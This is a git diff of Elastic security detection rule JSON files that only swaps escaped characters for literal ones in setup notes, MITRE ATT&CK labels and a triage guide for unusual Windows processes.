b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_107.json index 3e518b61030..818f8da32dc 100644 --- a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_107.json +++ b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_107.json 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "6aace640-e631-4870-ba8e-5fdda09325db", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_108.json b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_108.json index fe423f5414b..9f5f2f60923 100644 --- a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_108.json +++ b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_108.json 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "6aace640-e631-4870-ba8e-5fdda09325db", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_109.json b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_109.json index 731df723182..0b7376692cc 100644 --- a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_109.json +++ b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_109.json 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "6aace640-e631-4870-ba8e-5fdda09325db", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_1.json b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_1.json index 776fda96b0d..3d345e39b5d 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_1.json +++ b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_1.json 
@@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_2.json b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_2.json index 7b110dea775..6b648508e67 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_2.json +++ b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_2.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_3.json b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_3.json index 764c3649cc1..42b010b519d 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_3.json +++ b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_3.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_103.json b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_103.json index 6cbae778429..829f4041402 100644 --- a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_103.json +++ b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_103.json 
@@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_104.json b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_104.json index 19d79098cbf..36d9b92e2a7 100644 --- a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_104.json +++ b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_105.json b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_105.json index 3707f4750c0..d7a9e0680fb 100644 --- a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_105.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", 
diff --git a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_206.json b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_206.json index d6c15a6eb04..c18e120e3fe 100644 --- a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_206.json +++ b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_206.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_207.json b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_207.json index 10e6924bec5..a3d2dea8e20 100644 --- a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_207.json +++ b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_207.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_104.json b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_104.json index 8942c539d44..5adf0c86176 100644 --- a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_104.json @@ -108,7 +108,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_105.json b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_105.json index b66b7efeb75..17bb29f4b4a 100644 --- a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_105.json @@ -103,7 +103,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_106.json b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_106.json index 995925f485c..9369c5e4126 100644 --- a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_106.json +++ b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_106.json @@ -104,7 +104,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_107.json b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_107.json index de39103c3af..9b3831b1eff 100644 --- a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_107.json 
+++ b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_107.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/6c6bb7ea-0636-44ca-b541-201478ef6b50_1.json b/packages/security_detection_engine/kibana/security_rule/6c6bb7ea-0636-44ca-b541-201478ef6b50_1.json index b67b26c01c2..dfbeb4f56aa 100644 --- a/packages/security_detection_engine/kibana/security_rule/6c6bb7ea-0636-44ca-b541-201478ef6b50_1.json +++ b/packages/security_detection_engine/kibana/security_rule/6c6bb7ea-0636-44ca-b541-201478ef6b50_1.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/6c6bb7ea-0636-44ca-b541-201478ef6b50_2.json b/packages/security_detection_engine/kibana/security_rule/6c6bb7ea-0636-44ca-b541-201478ef6b50_2.json index 3b50be7d004..be743c2b4ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/6c6bb7ea-0636-44ca-b541-201478ef6b50_2.json +++ b/packages/security_detection_engine/kibana/security_rule/6c6bb7ea-0636-44ca-b541-201478ef6b50_2.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_102.json b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_102.json index 3e6f9fb15da..70c864dc413 100644 --- a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_102.json +++ b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_102.json 
@@ -69,7 +69,7 @@
],
"risk_score": 47,
"rule_id": "6cd1779c-560f-4b68-a8f1-11009b27fe63",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
"severity": "medium",
"tags": [
"Elastic",
@@ -81,7 +81,7 @@
],
"threat": [
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0001",
"name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_103.json b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_103.json
index f8aa5ea1686..0befc83006d 100644
--- a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_103.json
@@ -69,7 +69,7 @@
],
"risk_score": 47,
"rule_id": "6cd1779c-560f-4b68-a8f1-11009b27fe63",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
"severity": "medium",
"tags": [
"Domain: Endpoint",
@@ -81,7 +81,7 @@
],
"threat": [
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0001",
"name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_104.json b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_104.json
index 933c9e915db..eb6503bd2ca 100644
--- a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_104.json
@@ -69,7 +69,7 @@
],
"risk_score": 47,
"rule_id": "6cd1779c-560f-4b68-a8f1-11009b27fe63",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
"severity": "medium",
"tags": [
"Domain: Endpoint",
@@ -82,7 +82,7 @@
],
"threat": [
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0001",
"name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_105.json b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_105.json
index fe5368fd739..b7aede240a6 100644
--- a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_105.json
@@ -69,7 +69,7 @@
],
"risk_score": 47,
"rule_id": "6cd1779c-560f-4b68-a8f1-11009b27fe63",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
"severity": "medium",
"tags": [
"Domain: Endpoint",
@@ -83,7 +83,7 @@
],
"threat": [
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0001",
"name": "Initial Access",
@@ -98,7 +98,7 @@
]
},
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0008",
"name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_106.json b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_106.json
index 15d17562fbe..058ca537008 100644
--- a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_106.json
@@ -69,7 +69,7 @@
],
"risk_score": 47,
"rule_id": "6cd1779c-560f-4b68-a8f1-11009b27fe63",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
"severity": "medium",
"tags": [
"Domain: Endpoint",
@@ -83,7 +83,7 @@
],
"threat": [
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0001",
"name": "Initial Access",
@@ -98,7 +98,7 @@
]
},
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0008",
"name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_104.json b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_104.json
index 953354c28f0..5497754f792 100644
--- a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_104.json
@@ -15,7 +15,7 @@ "v3_rare_process_by_host_windows" ], "name": "Unusual Process For a Windows Host", - "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. 
Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. 
Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. 
These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], 
@@ -34,7 +34,7 @@
],
"threat": [
{
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": {
"id": "TA0003",
"name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_105.json b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_105.json
index 8ce0b73a9a0..e7fe1d4b32c 100644
--- a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_105.json
